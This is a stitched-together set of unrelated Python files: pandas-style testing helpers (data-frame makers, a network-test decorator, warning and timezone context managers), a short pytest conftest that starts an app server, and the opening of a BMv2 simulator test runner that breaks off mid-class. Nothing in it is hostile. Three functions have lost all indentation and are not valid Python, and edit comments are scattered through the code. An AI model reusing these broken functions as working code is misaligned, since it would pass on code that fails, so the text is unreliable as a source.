    """Yield the maker *functions* (uncalled) for Index subclasses."""
    yield from (
        makeDateIndex,
        makePeriodIndex,
        makeTimedeltaIndex,
        makeRangeIndex,
        makeIntervalIndex,
        makeCategoricalIndex,
        makeMultiIndex,
    )
def all_timeseries_index_generator(k=10):
    """Generator which can be iterated over to get instances of all the classes
    which represent time-series.

    Parameters
    ----------
    k: length of each of the index instances
    """
    make_index_funcs = [makeDateIndex, makePeriodIndex, makeTimedeltaIndex]
    for make_index_func in make_index_funcs:
        yield make_index_func(k=k)
# make series
def makeFloatSeries(name=None):
    # Series of N standard-normal floats over a random string index.
    index = makeStringIndex(N)
    return Series(randn(N), index=index, name=name)
def makeStringSeries(name=None):
    # Same shape as makeFloatSeries: N normal floats over string labels.
    index = makeStringIndex(N)
    return Series(randn(N), index=index, name=name)
def makeObjectSeries(name=None):
    # Series whose *values* are strings, forced to object dtype via Index.
    data = makeStringIndex(N)
    data = Index(data, dtype=object)
    index = makeStringIndex(N)
    return Series(data, index=index, name=name)
def getSeriesData():
    # Dict of K random Series ("A", "B", ...) sharing one string index.
    index = makeStringIndex(N)
    return {c: Series(randn(N), index=index) for c in getCols(K)}
def makeTimeSeries(nper=None, freq="B", name=None):
    # Random Series over a DatetimeIndex at `freq`; length defaults to N.
    if nper is None:
        nper = N
    return Series(randn(nper), index=makeDateIndex(nper, freq=freq), name=name)
def makePeriodSeries(nper=None, name=None):
    # Random Series over a PeriodIndex; length defaults to N.
    if nper is None:
        nper = N
    return Series(randn(nper), index=makePeriodIndex(nper), name=name)
def getTimeSeriesData(nper=None, freq="B"):
    # Dict of K random time series keyed "A", "B", ...
    return {c: makeTimeSeries(nper, freq) for c in getCols(K)}
def getPeriodData(nper=None):
    # Dict of K random period-indexed series keyed "A", "B", ...
    return {c: makePeriodSeries(nper) for c in getCols(K)}
# make frame
def makeTimeDataFrame(nper=None, freq="B"):
    # DataFrame of K random time-series columns.
    data = getTimeSeriesData(nper, freq)
    return DataFrame(data)
def makeDataFrame():
    # N x K random frame over a string index.
    data = getSeriesData()
    return DataFrame(data)
def getMixedTypeDict():
    """Return (index, data) for a tiny frame with float/str/datetime columns."""
    index = Index(["a", "b", "c", "d", "e"])
    data = dict(
        A=[0.0, 1.0, 2.0, 3.0, 4.0],
        B=[0.0, 1.0, 0.0, 1.0, 0.0],
        C=["foo1", "foo2", "foo3", "foo4", "foo5"],
        D=bdate_range("1/1/2009", periods=5),
    )
    return index, data
def makeMixedDataFrame():
    # Frame built from getMixedTypeDict()'s data; uses default integer index.
    return DataFrame(getMixedTypeDict()[1])
def makePeriodFrame(nper=None):
    # Frame of K random period-indexed columns.
    data = getPeriodData(nper)
    return DataFrame(data)
def makeCustomIndex(
    nentries, nlevels, prefix="#", names=False, ndupe_l=None, idx_type=None
):
    """Create an index/multindex with given dimensions, levels, names, etc'

    nentries - number of entries in index
    nlevels - number of levels (> 1 produces multindex)
    prefix - a string prefix for labels
    names - (Optional), bool or list of strings. if True will use default
       names, if false will use no names, if a list is given, the name of
       each level in the index will be taken from the list.
    ndupe_l - (Optional), list of ints, the number of rows for which the
       label will repeated at the corresponding level, you can specify just
       the first few, the rest will use the default ndupe_l of 1.
       len(ndupe_l) <= nlevels.
    idx_type - "i"/"f"/"s"/"u"/"dt"/"p"/"td".
       If idx_type is not None, `idx_nlevels` must be 1.
       "i"/"f" creates an integer/float index,
       "s"/"u" creates a string/unicode index
       "dt" create a datetime index.
       "td" create a timedelta index.
       if unspecified, string labels will be generated.
    """
    if ndupe_l is None:
        ndupe_l = [1] * nlevels
    assert is_sequence(ndupe_l) and len(ndupe_l) <= nlevels
    # Fix: compare the lengths with ==, not `is` -- identity between ints
    # only works by accident of CPython's small-integer cache.
    assert names is None or names is False or names is True or len(names) == nlevels
    assert idx_type is None or (
        idx_type in ("i", "f", "s", "u", "dt", "p", "td") and nlevels == 1
    )
    if names is True:
        # build default names
        names = [prefix + str(i) for i in range(nlevels)]
    if names is False:
        # pass None to index constructor for no name
        names = None
    # make singleton case uniform
    if isinstance(names, str) and nlevels == 1:
        names = [names]
    # specific 1D index type requested?
    idx_func = dict(
        i=makeIntIndex,
        f=makeFloatIndex,
        s=makeStringIndex,
        u=makeUnicodeIndex,
        dt=makeDateIndex,
        td=makeTimedeltaIndex,
        p=makePeriodIndex,
    ).get(idx_type)
    if idx_func:
        idx = idx_func(nentries)
        # but we need to fill in the name
        if names:
            idx.name = names[0]
        return idx
    elif idx_type is not None:
        raise ValueError(
            f"{repr(idx_type)} is not a legal value for `idx_type`, "
            "use 'i'/'f'/'s'/'u'/'dt'/'p'/'td'."
        )

    if len(ndupe_l) < nlevels:
        ndupe_l.extend([1] * (nlevels - len(ndupe_l)))
    assert len(ndupe_l) == nlevels
    assert all(x > 0 for x in ndupe_l)

    def keyfunc(x):
        # Sort labels numerically by the integers embedded in
        # "{prefix}_l{i}_g{j}".  (Hoisted out of the level loop below --
        # it does not depend on the loop variable.)
        import re

        numeric_tuple = re.sub(r"[^\d_]_?", "", x).split("_")
        return [int(num) for num in numeric_tuple]

    tuples = []
    for i in range(nlevels):
        # build a list of lists to create the index from
        div_factor = nentries // ndupe_l[i] + 1
        cnt = Counter()
        for j in range(div_factor):
            label = f"{prefix}_l{i}_g{j}"
            cnt[label] = ndupe_l[i]
        # cute Counter trick
        result = sorted(cnt.elements(), key=keyfunc)[:nentries]
        tuples.append(result)
    tuples = list(zip(*tuples))
    # convert tuples to index
    if nentries == 1:
        # we have a single level of tuples, i.e. a regular Index
        index = Index(tuples[0], name=names[0])
    elif nlevels == 1:
        name = None if names is None else names[0]
        index = Index((x[0] for x in tuples), name=name)
    else:
        index = MultiIndex.from_tuples(tuples, names=names)
    return index
def makeCustomDataframe(
    nrows,
    ncols,
    c_idx_names=True,
    r_idx_names=True,
    c_idx_nlevels=1,
    r_idx_nlevels=1,
    data_gen_f=None,
    c_ndupe_l=None,
    r_ndupe_l=None,
    dtype=None,
    c_idx_type=None,
    r_idx_type=None,
):
    """
    Create a DataFrame using supplied parameters.

    nrows, ncols - number of data rows/cols
    c_idx_names, idx_names - False/True/list of strings, yields No names ,
       default names or uses the provided names for the levels of the
       corresponding index. You can provide a single string when
       c_idx_nlevels ==1.
    c_idx_nlevels - number of levels in columns index. > 1 will yield MultiIndex
    r_idx_nlevels - number of levels in rows index. > 1 will yield MultiIndex
    data_gen_f - a function f(row,col) which return the data value
       at that position, the default generator used yields values of the form
       "RxCy" based on position.
    c_ndupe_l, r_ndupe_l - list of integers, determines the number
       of duplicates for each label at a given level of the corresponding
       index. The default `None` value produces a multiplicity of 1 across
       all levels, i.e. a unique index. Will accept a partial list of length
       N < idx_nlevels, for just the first N levels. If ndupe doesn't divide
       nrows/ncol, the last label might have lower multiplicity.
    dtype - passed to the DataFrame constructor as is, in case you wish to
       have more control in conjunction with a custom `data_gen_f`
    r_idx_type, c_idx_type - "i"/"f"/"s"/"u"/"dt"/"td".
       If idx_type is not None, `idx_nlevels` must be 1.
       "i"/"f" creates an integer/float index,
       "s"/"u" creates a string/unicode index
       "dt" create a datetime index.
       "td" create a timedelta index.
       if unspecified, string labels will be generated.

    Examples:
    # 5 row, 3 columns, default names on both, single index on both axis
    >> makeCustomDataframe(5,3)
    # make the data a random int between 1 and 100
    >> mkdf(5,3,data_gen_f=lambda r,c:randint(1,100))
    # 2-level multiindex on rows with each label duplicated
    # twice on first level, default names on both axis, single
    # index on both axis
    >> a=makeCustomDataframe(5,3,r_idx_nlevels=2,r_ndupe_l=[2])
    # DatetimeIndex on row, index with unicode labels on columns
    # no names on either axis
    >> a=makeCustomDataframe(5,3,c_idx_names=False,r_idx_names=False,
                             r_idx_type="dt",c_idx_type="u")
    # 4-level multindex on rows with names provided, 2-level multindex
    # on columns with default labels and default names.
    >> a=makeCustomDataframe(5,3,r_idx_nlevels=4,
                             r_idx_names=["FEE","FI","FO","FAM"],
                             c_idx_nlevels=2)
    >> a=mkdf(5,3,r_idx_nlevels=2,c_idx_nlevels=4)
    """
    assert c_idx_nlevels > 0
    assert r_idx_nlevels > 0
    assert r_idx_type is None or (
        r_idx_type in ("i", "f", "s", "u", "dt", "p", "td") and r_idx_nlevels == 1
    )
    assert c_idx_type is None or (
        c_idx_type in ("i", "f", "s", "u", "dt", "p", "td") and c_idx_nlevels == 1
    )
    # Both axes are built by the same helper; only the prefix differs.
    columns = makeCustomIndex(
        ncols,
        nlevels=c_idx_nlevels,
        prefix="C",
        names=c_idx_names,
        ndupe_l=c_ndupe_l,
        idx_type=c_idx_type,
    )
    index = makeCustomIndex(
        nrows,
        nlevels=r_idx_nlevels,
        prefix="R",
        names=r_idx_names,
        ndupe_l=r_ndupe_l,
        idx_type=r_idx_type,
    )
    # by default, generate data based on location
    if data_gen_f is None:
        data_gen_f = lambda r, c: f"R{r}C{c}"
    data = [[data_gen_f(r, c) for c in range(ncols)] for r in range(nrows)]
    return DataFrame(data, index, columns, dtype=dtype)
def _create_missing_idx(nrows, ncols, density, random_state=None):
if random_state is None:
random_state = np.random
else:
random_state = np.random.RandomState(random_state)
# below is cribbed from scipy.sparse
size = int(np.round((1 - density) * nrows * ncols))
# generate a few more to ensure unique values
min_rows = 5
fac = 1.02
extra_size = min(size + min_rows, fac * size)
def _gen_unique_rand(rng, _extra_size):
ind = rng.rand(int(_extra_size))
return np.unique(np.floor(ind * nrows * ncols))[:size]
ind = _gen_unique_rand(random_state, extra_size)
while ind.size < size:
extra_size *= 1.05
ind = _gen_unique_rand(random_state, extra_size)
j = np.floor(ind * 1.0 / nrows).astype(int)
i = (ind - j * nrows).astype(int)
return i.tolist(), j.tolist()
def makeMissingCustomDataframe(
    nrows,
    ncols,
    density=0.9,
    random_state=None,
    c_idx_names=True,
    r_idx_names=True,
    c_idx_nlevels=1,
    r_idx_nlevels=1,
    data_gen_f=None,
    c_ndupe_l=None,
    r_ndupe_l=None,
    dtype=None,
    c_idx_type=None,
    r_idx_type=None,
):
    """
    Parameters
    ----------
    Density : float, optional
        Float in (0, 1) that gives the percentage of non-missing numbers in
        the DataFrame.
    random_state : {np.random.RandomState, int}, optional
        Random number generator or random seed.

    See makeCustomDataframe for descriptions of the rest of the parameters.
    """
    df = makeCustomDataframe(
        nrows,
        ncols,
        c_idx_names=c_idx_names,
        r_idx_names=r_idx_names,
        c_idx_nlevels=c_idx_nlevels,
        r_idx_nlevels=r_idx_nlevels,
        data_gen_f=data_gen_f,
        c_ndupe_l=c_ndupe_l,
        r_ndupe_l=r_ndupe_l,
        dtype=dtype,
        c_idx_type=c_idx_type,
        r_idx_type=r_idx_type,
    )
    # Punch NaN holes into ~(1 - density) of the cells.
    # NOTE(review): writing through .values assumes it is a writable view
    # of the frame's data -- confirm for mixed dtypes.
    i, j = _create_missing_idx(nrows, ncols, density, random_state)
    df.values[i, j] = np.nan
    return df
def makeMissingDataframe(density=0.9, random_state=None):
    # Default random frame with ~(1 - density) of its cells set to NaN.
    df = makeDataFrame()
    i, j = _create_missing_idx(*df.shape, density=density, random_state=random_state)
    df.values[i, j] = np.nan
    return df
def optional_args(decorator):
    """allows a decorator to take optional positional and keyword arguments.
    Assumes that taking a single, callable, positional argument means that
    it is decorating a function, i.e. something like this::

        @my_decorator
        def function(): pass

    Calls decorator with decorator(f, *args, **kwargs)"""

    @wraps(decorator)
    def wrapper(*args, **kwargs):
        def dec(f):
            return decorator(f, *args, **kwargs)

        # Bare usage: a single positional callable and no kwargs means the
        # decorated function itself was passed straight in.
        if not kwargs and len(args) == 1 and callable(args[0]):
            f, args = args[0], []
            return dec(f)
        return dec

    return wrapper
# skip tests on exceptions with this message
# (substring match, case-insensitive -- see the `network` decorator below)
_network_error_messages = (
    # 'urlopen error timed out',
    # 'timeout: timed out',
    # 'socket.timeout: timed out',
    "timed out",
    "Server Hangup",
    "HTTP Error 503: Service Unavailable",
    "502: Proxy Error",
    "HTTP Error 502: internal error",
    "HTTP Error 502",
    "HTTP Error 503",
    "HTTP Error 403",
    "HTTP Error 400",
    "Temporary failure in name resolution",
    "Name or service not known",
    "Connection refused",
    "certificate verify",
)
# or this e.errno/e.reason.errno
# or this e.errno/e.reason.errno
_network_errno_vals = (
    101,  # Network is unreachable
    111,  # Connection refused
    110,  # Connection timed out
    104,  # Connection reset Error
    54,  # Connection reset by peer
    60,  # urllib.error.URLError: [Errno 60] Connection timed out
)
# Both of the above shouldn't mask real issues such as 404's
# or refused connections (changed DNS).
# But some tests (test_data yahoo) contact incredibly flakey
# servers.
# and conditionally raise on exception types in _get_default_network_errors
def _get_default_network_errors():
# Lazy import for http.client because it imports many things from the stdlib
import http.client
return (IOError, http.client.HTTPException, TimeoutError)
def can_connect(url, error_classes=None):
    """Return True if a connection to ``url`` can be opened.

    Parameters
    ----------
    url : str
        The URL to try to connect to.
    error_classes : tuple of Exception, optional
        Exception types that signal "no connectivity"; defaults to
        ``_get_default_network_errors()``.

    Returns
    -------
    connectable : bool
        False when opening the URL raises one of ``error_classes``,
        True otherwise.
    """
    classes = _get_default_network_errors() if error_classes is None else error_classes
    try:
        with urlopen(url):
            pass
    except classes:
        return False
    return True
@optional_args
def network(
    t,
    url="http://www.google.com",
    raise_on_error=_RAISE_NETWORK_ERROR_DEFAULT,
    check_before_test=False,
    error_classes=None,
    skip_errnos=_network_errno_vals,
    _skip_on_messages=_network_error_messages,
):
    """
    Label a test as requiring network connection and, if an error is
    encountered, only raise if it does not find a network connection.

    In comparison to ``network``, this assumes an added contract to your test:
    you must assert that, under normal conditions, your test will ONLY fail if
    it does not have network connectivity.

    You can call this in 3 ways: as a standard decorator, with keyword
    arguments, or with a positional argument that is the url to check.

    Parameters
    ----------
    t : callable
        The test requiring network connectivity.
    url : path
        The url to test via ``pandas.io.common.urlopen`` to check
        for connectivity. Defaults to 'http://www.google.com'.
    raise_on_error : bool
        If True, never catches errors.
    check_before_test : bool
        If True, checks connectivity before running the test case.
    error_classes : tuple or Exception
        error classes to ignore. If not in ``error_classes``, raises the error.
        defaults to IOError. Be careful about changing the error classes here.
    skip_errnos : iterable of int
        Any exception that has .errno or .reason.erno set to one
        of these values will be skipped with an appropriate
        message.
    _skip_on_messages: iterable of string
        any exception e for which one of the strings is
        a substring of str(e) will be skipped with an appropriate
        message. Intended to suppress errors where an errno isn't available.

    Notes
    -----
    * ``raise_on_error`` supercedes ``check_before_test``

    Returns
    -------
    t : callable
        The decorated test ``t``, with checks for connectivity errors.

    Example
    -------

    Tests decorated with @network will fail if it's possible to make a network
    connection to another URL (defaults to google.com)::

      >>> from pandas._testing import network
      >>> from pandas.io.common import urlopen
      >>> @network
      ... def test_network():
      ...     with urlopen("rabbit://bonanza.com"):
      ...         pass
      Traceback
         ...
      URLError: <urlopen error unknown url type: rabit>

    You can specify alternative URLs::

        >>> @network("http://www.yahoo.com")
        ... def test_something_with_yahoo():
        ...     raise IOError("Failure Message")
        >>> test_something_with_yahoo()
        Traceback (most recent call last):
            ...
        IOError: Failure Message

    If you set check_before_test, it will check the url first and not run the
    test on failure::

        >>> @network("failing://url.blaher", check_before_test=True)
        ... def test_something():
        ...     print("I ran!")
        ...     raise ValueError("Failure")
        >>> test_something()
        Traceback (most recent call last):
            ...

    Errors not related to networking will always be raised.
    """
    from pytest import skip

    if error_classes is None:
        error_classes = _get_default_network_errors()

    t.network = True

    @wraps(t)
    def wrapper(*args, **kwargs):
        if check_before_test and not raise_on_error:
            if not can_connect(url, error_classes):
                skip()
        try:
            return t(*args, **kwargs)
        except Exception as err:
            errno = getattr(err, "errno", None)
            # BUG FIX: the original tested hasattr(errno, "reason") -- an
            # int/None never has .reason, so URLError's nested errno was
            # never extracted.  The attribute lives on the exception itself.
            if not errno and hasattr(err, "reason"):
                errno = getattr(err.reason, "errno", None)
            if errno in skip_errnos:
                skip(f"Skipping test due to known errno and error {err}")
            e_str = str(err)
            if any(m.lower() in e_str.lower() for m in _skip_on_messages):
                skip(
                    f"Skipping test because exception message is known and error {err}"
                )
            if not isinstance(err, error_classes):
                raise
            if raise_on_error or can_connect(url, error_classes):
                raise
            else:
                skip(f"Skipping test due to lack of connectivity and error {err}")

    return wrapper


with_connectivity_check = network
@contextmanager
def assert_produces_warning(
    expected_warning=Warning,
    filter_level="always",
    clear=None,
    check_stacklevel=True,
    raise_on_extra_warnings=True,
):
    """
    Context manager for running code expected to either raise a specific
    warning, or not raise any warnings. Verifies that the code raises the
    expected warning, and that it does not raise any other unexpected
    warnings. It is basically a wrapper around ``warnings.catch_warnings``.

    Parameters
    ----------
    expected_warning : {Warning, False, None}, default Warning
        The type of Exception raised. ``exception.Warning`` is the base
        class for all warnings. To check that no warning is returned,
        specify ``False`` or ``None``.
    filter_level : str or None, default "always"
        Specifies whether warnings are ignored, displayed, or turned
        into errors.
        Valid values are:

        * "error" - turns matching warnings into exceptions
        * "ignore" - discard the warning
        * "always" - always emit a warning
        * "default" - print the warning the first time it is generated
          from each location
        * "module" - print the warning the first time it is generated
          from each module
        * "once" - print the warning the first time it is generated

    clear : str, default None
        If not ``None`` then remove any previously raised warnings from
        the ``__warningsregistry__`` to ensure that no warning messages are
        suppressed by this context manager. If ``None`` is specified,
        the ``__warningsregistry__`` keeps track of which warnings have been
        shown, and does not show them again.
    check_stacklevel : bool, default True
        If True, displays the line that called the function containing
        the warning to show were the function is called. Otherwise, the
        line that implements the function is displayed.
    raise_on_extra_warnings : bool, default True
        Whether extra warnings not of the type `expected_warning` should
        cause the test to fail.

    Examples
    --------
    >>> import warnings
    >>> with assert_produces_warning():
    ...     warnings.warn(UserWarning())
    ...
    >>> with assert_produces_warning(False):
    ...     warnings.warn(RuntimeWarning())
    ...
    Traceback (most recent call last):
        ...
    AssertionError: Caused unexpected warning(s): ['RuntimeWarning'].
    >>> with assert_produces_warning(UserWarning):
    ...     warnings.warn(RuntimeWarning())
    Traceback (most recent call last):
        ...
    AssertionError: Did not see expected warning of class 'UserWarning'.

    ..warn:: This is *not* thread-safe.
    """
    __tracebackhide__ = True
    with warnings.catch_warnings(record=True) as w:
        if clear is not None:
            # make sure that we are clearing these warnings
            # if they have happened before
            # to guarantee that we will catch them
            if not is_list_like(clear):
                clear = [clear]
            for m in clear:
                try:
                    m.__warningregistry__.clear()
                except AttributeError:
                    # module may not have __warningregistry__
                    pass
        saw_warning = False
        warnings.simplefilter(filter_level)
        yield w
        # Everything below runs after the `with` body has finished,
        # inspecting the warnings the body emitted.
        extra_warnings = []
        for actual_warning in w:
            if expected_warning and issubclass(
                actual_warning.category, expected_warning
            ):
                saw_warning = True
                if check_stacklevel and issubclass(
                    actual_warning.category, (FutureWarning, DeprecationWarning)
                ):
                    from inspect import getframeinfo, stack

                    # The warning should appear to come from the caller of
                    # this context manager, i.e. two frames up.
                    caller = getframeinfo(stack()[2][0])
                    msg = (
                        "Warning not set with correct stacklevel. "
                        f"File where warning is raised: {actual_warning.filename} != "
                        f"{caller.filename}. Warning message: {actual_warning.message}"
                    )
                    assert actual_warning.filename == caller.filename, msg
            else:
                extra_warnings.append(
                    (
                        actual_warning.category.__name__,
                        actual_warning.message,
                        actual_warning.filename,
                        actual_warning.lineno,
                    )
                )
        if expected_warning:
            msg = (
                f"Did not see expected warning of class "
                f"{repr(expected_warning.__name__)}"
            )
            assert saw_warning, msg
        if raise_on_extra_warnings and extra_warnings:
            raise AssertionError(
                f"Caused unexpected warning(s): {repr(extra_warnings)}"
            )
class RNGContext:
    """
    Context manager that seeds numpy's global RNG on entry and restores
    the previous RNG state on exit.

    Parameters
    ----------
    seed : int
        Seed for numpy.random.seed

    Examples
    --------
    with RNGContext(42):
        np.random.randn()
    """

    def __init__(self, seed):
        self.seed = seed

    def __enter__(self):
        # Snapshot the global state so __exit__ can restore it exactly.
        self.start_state = np.random.get_state()
        np.random.seed(self.seed)

    def __exit__(self, exc_type, exc_value, traceback):
        np.random.set_state(self.start_state)
@contextmanager
def with_csv_dialect(name, **kwargs):
    """
    Temporarily register a CSV dialect, unregistering it on exit.

    Parameters
    ----------
    name : str
        The name of the dialect.
    kwargs : mapping
        The parameters for the dialect.

    Raises
    ------
    ValueError : the name of the dialect conflicts with a builtin one.

    See Also
    --------
    csv : Python's CSV library.
    """
    import csv

    if name in {"excel", "excel-tab", "unix"}:
        raise ValueError("Cannot override builtin dialect.")
    csv.register_dialect(name, **kwargs)
    yield
    csv.unregister_dialect(name)
@contextmanager
def use_numexpr(use, min_elements=None):
    # Temporarily toggle pandas' numexpr usage and its element-count
    # threshold, restoring both previous settings afterwards.  Not
    # exception-safe (no try/finally), mirroring historical behavior.
    from pandas.core.computation import expressions as expr

    if min_elements is None:
        min_elements = expr._MIN_ELEMENTS

    saved_use = expr._USE_NUMEXPR
    saved_min = expr._MIN_ELEMENTS
    expr.set_use_numexpr(use)
    expr._MIN_ELEMENTS = min_elements
    yield
    expr._MIN_ELEMENTS = saved_min
    expr.set_use_numexpr(saved_use)
def test_parallel(num_threads=2, kwargs_list=None):
    """Decorator to run the same function multiple times in parallel.

    Parameters
    ----------
    num_threads : int, optional
        The number of times the function is run in parallel.
    kwargs_list : list of dicts, optional
        The list of kwargs to update original
        function kwargs on different threads.

    Notes
    -----
    This decorator does not pass the return value of the decorated function.

    Original from scikit-image:
    https://github.com/scikit-image/scikit-image/pull/1519
    """
    assert num_threads > 0
    if kwargs_list is not None:
        assert len(kwargs_list) == num_threads
    import threading

    def wrapper(func):
        @wraps(func)
        def inner(*args, **kwargs):
            # Per-thread kwargs: overlay kwargs_list[i] when provided.
            if kwargs_list is None:
                per_thread = [kwargs] * num_threads
            else:
                per_thread = [
                    dict(kwargs, **kwargs_list[i]) for i in range(num_threads)
                ]
            workers = [
                threading.Thread(target=func, args=args, kwargs=kw)
                for kw in per_thread
            ]
            for worker in workers:
                worker.start()
            for worker in workers:
                worker.join()

        return inner

    return wrapper
class SubclassedSeries(Series):
    """Series subclass used to verify metadata/type propagation."""

    _metadata = ["testattr", "name"]

    @property
    def _constructor(self):
        # Keep slicing/arithmetic results in the subclass.
        return SubclassedSeries

    @property
    def _constructor_expanddim(self):
        # to_frame() and friends yield the companion DataFrame subclass.
        return SubclassedDataFrame
class SubclassedDataFrame(DataFrame):
    """DataFrame subclass used to verify metadata/type propagation."""

    _metadata = ["testattr"]

    @property
    def _constructor(self):
        # Frame-shaped results stay in the subclass.
        return SubclassedDataFrame

    @property
    def _constructor_sliced(self):
        # Column/row extraction yields the companion Series subclass.
        return SubclassedSeries
class SubclassedCategorical(Categorical):
    """Categorical subclass; derived results should keep the subclass."""

    @property
    def _constructor(self):
        return SubclassedCategorical
@contextmanager
def set_timezone(tz: str):
    """
    Context manager for temporarily setting a timezone.

    Parameters
    ----------
    tz : str
        A string representing a valid timezone.

    Examples
    --------
    >>> from datetime import datetime
    >>> from dateutil.tz import tzlocal
    >>> tzlocal().tzname(datetime.now())
    'IST'

    >>> with set_timezone('US/Eastern'):
    ...     tzlocal().tzname(datetime.now())
    ...
    'EDT'
    """
    import os
    import time

    def _apply(zone):
        if zone is None:
            # Unset; tzset() intentionally not called on this branch
            # (matches the historical behavior).
            os.environ.pop("TZ", None)
        else:
            os.environ["TZ"] = zone
            time.tzset()

    previous = os.environ.get("TZ")
    _apply(tz)
    try:
        yield
    finally:
        _apply(previous)
def _make_skipna_wrapper(alternative, skipna_alternative=None):
"""
Create a function for calling on an array.
Parameters
----------
alternative : function
The function to be called on the array with no NaNs.
Only used when 'skipna_alternative' is None.
skipna_alternative : function
The function to be called on the original array
Returns
-------
function
"""
if skipna_alternative:
def skipna_wrapper(x):
return skipna_alternative(x.values)
else:
def skipna_wrapper(x):
nona = x.dropna()
if len(nona) == 0:
return np.nan
return alternative(nona)
return skipna_wrapper
def convert_rows_list_to_csv_str(rows_list: List[str]):
    """
    Convert list of CSV rows to single CSV-formatted string for current OS.

    This method is used for creating expected value of to_csv() method.

    Parameters
    ----------
    rows_list : List[str]
        Each element represents the row of csv.

    Returns
    -------
    str
        Expected output of to_csv() in current OS.
    """
    # Every row -- including the last -- is terminated with the OS separator.
    return "".join(row + os.linesep for row in rows_list)
|
conftest_disabled.py
|
import multiprocessing
from pyramid import authorization
from pyramid.testing import testConfig
import pytest
from h.script import Application, assets
def run(start, settings):
    # Entry point for the server subprocess started by the `server` fixture.
    # NOTE(review): the Condition protocol here is subtle -- `prepare` runs
    # as gunicorn's post_worker_init hook and releases the lock the parent
    # is notified through; confirm the acquire/notify ordering is intended.
    def prepare(worker):
        # Build static assets, then signal that the worker is initialized.
        assets(settings)
        start.release()
    start.acquire()
    start.notify()
    app = Application('development.ini', settings)
    app.cfg.set('post_worker_init', prepare)
    app.cfg.set('logconfig', None)
    app.run()
@pytest.fixture(scope="session", autouse=True)
def server(settings):
    # Launch the app server in a daemon subprocess and block until it
    # signals readiness through the shared Condition.
    start = multiprocessing.Condition()
    start.acquire()
    srv = multiprocessing.Process(target=run, args=(start, settings))
    srv.daemon = True  # let the test session exit without joining
    srv.start()
    start.wait()
    start.release()
@pytest.fixture(scope="function", autouse=True)
def wipe(settings):
    # Re-include the API/model packages before every test; configuration
    # side effects reset per-test state.
    with testConfig(settings=settings) as config:
        authz = authorization.ACLAuthorizationPolicy()
        config.set_authorization_policy(authz)
        config.include('h.api')
        config.include('h.auth.local.models')
|
bmv2stf.py
|
#!/usr/bin/env python
# Copyright 2013-present Barefoot Networks, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Runs the BMv2 behavioral model simulator with input from an stf file
from __future__ import print_function
from subprocess import Popen
from threading import Thread
from glob import glob
import json
import sys
import re
import os
import stat
import tempfile
import shutil
import difflib
import subprocess
import signal
import time
import random
import errno
import socket
from string import maketrans
from collections import OrderedDict
try:
from scapy.layers.all import *
from scapy.utils import *
except ImportError:
pass
# Process exit codes used throughout this script.
SUCCESS = 0
FAILURE = 1
class TimeoutException(Exception):
    """Raised by the SIGALRM handler when a step exceeds its deadline."""
    pass


def signal_handler(signum, frame):
    # Convert SIGALRM into an exception so timeouts unwind the stack.
    # Fix: `raise Cls, "msg"` is Python 2-only syntax; the call form is
    # equivalent and also parses under Python 3.
    raise TimeoutException("Timed out!")


signal.signal(signal.SIGALRM, signal_handler)
class Options(object):
    """Mutable bag of command-line options with their defaults."""

    def __init__(self):
        # All options start unset/off; the argument parser fills them in.
        self.binary = None
        self.verbose = False
        self.preserveTmp = False
        self.observationLog = None
def nextWord(text, sep = None):
    """Split `text` at the first occurrence of `sep` (whitespace when None).

    The separator is discarded; returns a (first, rest) pair of stripped
    strings, either of which may be ''.
    """
    pieces = text.split(sep, 1)
    if not pieces:
        return '', ''
    if len(pieces) == 1:
        return pieces[0].strip(), ''
    return pieces[0].strip(), pieces[1].strip()
def ByteToHex(byteStr):
    """Render a character string as space-separated uppercase hex pairs."""
    return ' '.join("%02X" % ord(ch) for ch in byteStr)
def HexToByte(hexStr):
    """Inverse of ByteToHex: parse hex pairs (spaces optional) into a
    string of characters with those code points."""
    # Fix: the original accumulated into a local named `bytes`, shadowing
    # the builtin type; use a comprehension over the compacted string.
    compact = ''.join(hexStr.split(" "))
    return ''.join(
        chr(int(compact[i:i + 2], 16)) for i in range(0, len(compact), 2)
    )
def reportError(*message):
    """Print an error message to stdout, prefixed with '***'."""
    print("***", *message)
class Local(object):
    # object to hold local vars accessable to nested functions
    # (Python 2 has no `nonlocal`; attributes on this stand-in are the
    # conventional workaround for closures that must rebind state.)
    pass
def FindExe(dirname, exe):
    # Walk up from the current working directory looking for a directory
    # named `dirname`; within the first one found, return the path of the
    # most recently modified executable file named `exe`.  Falls back to
    # the bare name (resolved via PATH by the caller) when nothing matches.
    dir = os.getcwd()
    while len(dir) > 1:
        if os.path.isdir(os.path.join(dir, dirname)):
            rv = None
            rv_time = 0
            for dName, sdName, fList in os.walk(os.path.join(dir, dirname)):
                if exe in fList:
                    n=os.path.join(dName, exe)
                    if os.path.isfile(n) and os.access(n, os.X_OK):
                        n_time = os.path.getmtime(n)
                        # prefer the newest build of the executable
                        if n_time > rv_time:
                            rv = n
                            rv_time = n_time
            if rv is not None:
                return rv
        dir = os.path.dirname(dir)
    return exe
def run_timeout(options, args, timeout, stderr):
    # Run `args` as a subprocess, terminating it after `timeout` seconds.
    # Returns the process exit code, or -1 when the process never started.
    if options.verbose:
        print("Executing ", " ".join(args))
    local = Local()
    local.process = None
    def target():
        # Runs in a worker thread so the main thread can enforce the timeout
        # via thread.join(timeout).
        procstderr = None
        if stderr is not None:
            procstderr = open(stderr, "w")
        local.process = Popen(args, stderr=procstderr)
        local.process.wait()
    thread = Thread(target=target)
    thread.start()
    thread.join(timeout)
    if thread.is_alive():
        # Deadline passed: kill the child and wait for the thread to finish.
        print("Timeout ", " ".join(args), file=sys.stderr)
        local.process.terminate()
        thread.join()
    if local.process is None:
        # never even started
        reportError("Process failed to start")
        return -1
    if options.verbose:
        print("Exit code ", local.process.returncode)
    return local.process.returncode
# Default wall-clock limit for subprocess runs: 10 minutes, in seconds.
timeout = 10 * 60
class ConcurrentInteger(object):
    # Generates exclusive integers in a range 0-max
    # in a way which is safe across multiple processes.
    # It uses a simple form of locking using folder names.
    # This is necessary because this script may be invoked
    # concurrently many times by make, and we need the many simulator instances
    # to use different port numbers.
    def __init__(self, folder, max):
        # NOTE(review): `folder` is stored but lockName() builds a relative
        # path, so lock directories land in the current working directory --
        # confirm whether that is intended.
        self.folder = folder
        self.max = max

    def lockName(self, value):
        """Directory name used as the lock for `value`."""
